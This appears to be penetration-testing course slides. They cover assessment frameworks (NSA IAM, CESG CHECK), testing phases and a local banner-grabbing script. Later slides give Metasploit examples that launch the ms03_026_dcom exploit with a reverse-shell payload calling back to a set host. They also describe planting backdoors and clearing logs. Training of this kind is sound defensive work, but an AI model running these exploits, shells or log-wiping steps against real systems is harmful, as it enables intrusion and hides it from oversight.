4. OS configuration - Vulnerabilities due to improperly configured operating system software.
Software maintenance - Vulnerabilities due to failure to apply patches to known vulnerabilities.
Password/access control - Failure to comply with password policy and improper access control settings.
Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of use.
Dangerous services - Existence of vulnerable or easily exploited services or processes.
Application configuration - Vulnerabilities due to improperly configured applications.
7. NSA (US)
The United States National Security Agency (NSA) has provided an INFOSEC Assessment Methodology (IAM) framework to help consultants and security professionals outside the NSA provide assessment services to clients in line with a recognized standard.
http://www.iatrp.com
CESG CHECK (UK)
The Government Communications Headquarters (GCHQ) in the United Kingdom has an information assurance arm known as the Communications and Electronics Security Group (CESG). In the same way that the NSA IAM framework allows security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security testing teams within the U.K. to undertake government assessment work.
http://www.cesg.gov.uk/site/check/index.cfm
8. The IAM framework defines three levels of assessment:
Assessment - Level 1 involves discovering a cooperative high-level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands-on network or system testing is undertaken at this level.
Evaluation - Level 2 is a hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise.
Red Team - Level 3 is non-cooperative and external to the target network, involving penetration testing to simulate the appropriate adversary. IAM assessment is nonintrusive, so within this framework a Level 3 assessment involves full qualification of vulnerabilities rather than active exploitation.
9. CESG CHECK network security assessment competencies:
1. Use of DNS information retrieval tools for both single and multiple records, including an understanding of DNS record structure relating to target hosts.
2. Use of ICMP, TCP, and UDP network mapping and probing tools.
3. Demonstration of TCP service banner grabbing.
4. Information retrieval using SNMP, including an understanding of MIB structure relating to target system configuration and network routes.
5. Understanding of common weaknesses in routers and switches relating to Telnet, HTTP, SNMP, and TFTP access and configuration.
10. CESG CHECK Unix-specific competencies:
1. User enumeration via finger, rusers, rwho, and SMTP techniques.
2. Use of tools to enumerate Remote Procedure Call (RPC) services and demonstrate an understanding of the security implications associated with those services.
3. Demonstration of testing for Network File System (NFS) weaknesses.
4. Testing for weaknesses within r-services (rsh, rexec, and rlogin).
5. Detection of insecure X Windows servers.
6. Testing for weaknesses within web, FTP, and Samba services.
11. CESG CHECK Windows NT-specific competencies:
1. Assessment of NetBIOS and CIFS services to enumerate users, groups, shares, domains, domain controllers, password policies, and associated weaknesses.
2. Username and password grinding via NetBIOS and CIFS services.
3. Detecting and demonstrating the presence of known security weaknesses within Internet Information Server (IIS) web and FTP service components, and Microsoft SQL Server.
12. Other Assessment Standards & Associations:
ISECOM's Open Source Security Testing Methodology Manual (OSSTMM)
http://www.osstmm.org
Council of Registered Ethical Security Testers (CREST)
http://www.crestapproved.com
TIGER Scheme
http://www.tigerscheme.org
EC-Council's Certified Ethical Hacker (CEH)
http://www.eccouncil.org/CEH.htm
Open Web Application Security Project (OWASP)
http://www.owasp.org
14. Vulnerability Scanning
Uses automated systems (such as Nessus, ISS Internet Scanner, QualysGuard, or eEye Retina) with minimal hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn't provide a clear strategy to improve security.
Network Security Assessment
An effective blend of automated and hands-on manual vulnerability testing and qualification. The report is usually written by hand, accurate, and concise, giving practical advice that can improve a company's security.
15. Web Application Testing
Involves post-authentication assessment of web application components, identifying command injection, poor permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated.
Penetration Testing
Involves multiple attack vectors (e.g., telephone war dialing, social engineering, and wireless testing) to compromise the target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.
16. Onsite Auditing
Provides the clearest picture of network security. Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.
19. High-level components of Network Assessment:
1. Network reconnaissance to identify IP networks and hosts of interest.
2. Bulk network scanning and probing to identify potentially vulnerable hosts.
3. Investigation of vulnerabilities and further network probing by hand.
4. Exploitation of vulnerabilities and circumvention of security mechanisms.
20. 1. Information Gathering
2. Service Enumeration
3. Vulnerability Identification
4. Penetration
5. Maintaining Access
6. Housekeeping
21. Information Gathering
The objective of information gathering is to find as much information as possible about the target of evaluation, using passive (Google, Whois, WWW) or active (social engineering) information gathering.
Service Enumeration
Involves launching network and port scanning to find open and filtered ports and to identify the services running on each port.
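Slide 9 lists TCP service banner grabbing as a CHECK competency and the Service Enumeration step above describes finding open ports and the services behind them. The Python below is an added example, not code from the original slides or from the CESG CHECK scheme, showing the grab-then-probe logic that such a pass relies on: some services (SMTP, FTP, SSH) greet as soon as the connection is up, others (HTTP) say nothing until they receive a request, and a port that refuses is "closed" while one that never answers is "filtered". The two local listeners, their banners and all port numbers are constructed for the demonstration; the "filtered" state is only reached on a connection timeout, which an offline run against 127.0.0.1 does not exercise.

```python
import socket
import threading

# Constructed sample services for offline demonstration (not real targets).
SMTP_BANNER = b"220 mail.example.test ESMTP ready\r\n"            # greets first, like SMTP/FTP/SSH
HTTP_RESPONSE = b"HTTP/1.0 200 OK\r\nServer: Apache/2.2.3\r\n\r\n"  # silent until probed, like HTTP
HTTP_PROBE = b"HEAD / HTTP/1.0\r\n\r\n"                            # probe sent to a silent service


def _serve_one(srv, greeting, reply):
    """Accept a single client: send the greeting (if any), then answer its first request (if any)."""
    conn, _ = srv.accept()
    with conn:
        if greeting:
            conn.sendall(greeting)
        if reply:
            conn.settimeout(5)
            try:
                conn.recv(1024)  # wait for the client's probe before answering
            except socket.timeout:
                pass
            conn.sendall(reply)
    srv.close()


def start_fake_service(greeting=None, reply=None):
    """Listen on an ephemeral 127.0.0.1 port, serve one client in the background, return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    threading.Thread(target=_serve_one, args=(srv, greeting, reply), daemon=True).start()
    return srv.getsockname()[1]


def free_closed_port():
    """Reserve and release an ephemeral port so that connecting to it is refused (closed)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def grab_banner(host, port, timeout=2.0, probe=HTTP_PROBE):
    """Return (state, banner); state is 'open', 'closed' (refused) or 'filtered' (no answer at all).

    First wait for a greeting; if the service stays silent, send a probe and read the reply.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                data = s.recv(1024)
            except socket.timeout:
                data = b""
            if not data:
                try:
                    s.sendall(probe)
                    data = s.recv(1024)
                except (socket.timeout, OSError):
                    data = b""
            return "open", data.decode("latin-1").strip()
    except ConnectionRefusedError:
        return "closed", ""
    except (socket.timeout, OSError):
        return "filtered", ""


def fingerprint(banner):
    """Classify a banner by protocol convention (a small hand-written rule set, not a full signature database)."""
    if not banner:
        return "no-banner"
    if banner.startswith("SSH-"):
        return "ssh"
    if banner.startswith("HTTP/"):
        return "http"
    if banner.startswith("220 "):
        return "smtp" if "SMTP" in banner.upper() else "ftp"
    return "unknown"


def enumerate_services(host, ports, timeout=2.0):
    """Map each port to (state, service, banner), as a hands-on enumeration pass would record it."""
    results = {}
    for port in ports:
        state, banner = grab_banner(host, port, timeout)
        results[port] = (state, fingerprint(banner) if state == "open" else "", banner)
    return results


if __name__ == "__main__":
    smtp = start_fake_service(greeting=SMTP_BANNER)
    http = start_fake_service(reply=HTTP_RESPONSE)
    for port, (state, service, banner) in enumerate_services("127.0.0.1", [smtp, http, free_closed_port()]).items():
        print(f"{port}/tcp {state:8} {service:9} {banner.splitlines()[0] if banner else ''}")
```

Against a real target the host argument is the address under test and the closed/filtered distinction is what reveals a packet filter in the path; the Server header in the HTTP reply is the kind of version disclosure that the later vulnerability identification step works from. Real banner-grabbing tools carry far larger probe and signature sets than the three rules above.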
22. Vulnerability Identification
Involves finding new and currently known vulnerabilities in the operating systems, applications and/or services discovered (manually or with automated tools).
Penetration
Involves active penetration of a specific target of evaluation by exploiting a new or known vulnerability.
23. Maintaining Access
Involves uploading a trojan or backdoor so that the target of evaluation can be entered and left again without repeating the exploitation, while ensuring that the activity is not noticed.
Housekeeping
Cleaning up to cover tracks. Involves disabling audit settings and clearing or altering log files (system, security and application).
41. Metasploit Framework Exploit Module (MSFConsole)
cd /pentest/exploits/msf3
./msfconsole
Syntax:
msf > help
msf > show exploits
msf > use <exploit_module>
msf > show payloads
msf > set PAYLOAD <payload_type>
msf > show options
msf > set RHOST <target_ip>
msf > set LHOST <localhost_ip>
msf > set LPORT <local_port>
msf > set RPORT <remote_port>
msf > show targets
msf > set TARGET <target_id>
msf > exploit
42. Metasploit Framework Exploit Module (MSFConsole)
cd /pentest/exploits/msf3
./msfconsole
Example:
msf > help
msf > show exploits
msf > use windows/dcerpc/ms03_026_dcom
msf > show payloads
msf > set PAYLOAD windows/shell/reverse_tcp
msf > show options
msf > set RHOST 131.107.1.101
msf > set LHOST 131.107.1.252
msf > set LPORT 5555
msf > set RPORT 1234
msf > show targets
msf > set TARGET 0
msf > exploit
Note: RPORT for ms03_026_dcom defaults to 135 (the DCE/RPC endpoint mapper); the value 1234 above is only a placeholder and should be left at the default unless the target's endpoint mapper listens elsewhere. With a reverse_tcp payload, LHOST and LPORT must be reachable from the target, since the compromised host connects back to them.
43. Metasploit Framework Auxiliary Module
cd /pentest/exploits/msf3
./msfconsole
Syntax:
msf > help
msf > show auxiliary
msf > use <auxiliary_module>
msf > set RHOSTS <target_ip_or_network_id>
msf > run
Note: auxiliary modules are started with run rather than exploit. Scanner modules take RHOSTS (a single address, a CIDR range, or file:/path/to/list) and a THREADS option that controls how many hosts are probed concurrently.
44. Metasploit Framework Auxiliary Module
cd /pentest/exploits/msf3
./msfconsole
Example 1:
msf > help
msf > show auxiliary
msf > use scanner/smb/smb_version
msf > set RHOSTS 131.107.1.101
msf > run
Example 2:
msf > help
msf > show auxiliary
msf > use scanner/smb/smb_version
msf > set RHOSTS 131.107.1.0/24
msf > run
45. Metasploit Framework Exploit Module (MSFCLI)
cd /pentest/exploits/msf3
Syntax:
./msfcli <exploit_module> PAYLOAD=<payload_type> <OPTION>=<value> ... <mode>
The final argument is the mode: E executes the exploit; O shows the module's options, P its compatible payloads, T its targets, and C runs the module's check routine where one is provided, which is the non-intrusive way to confirm a vulnerability before choosing E.
Example:
./msfcli windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=131.107.1.101 E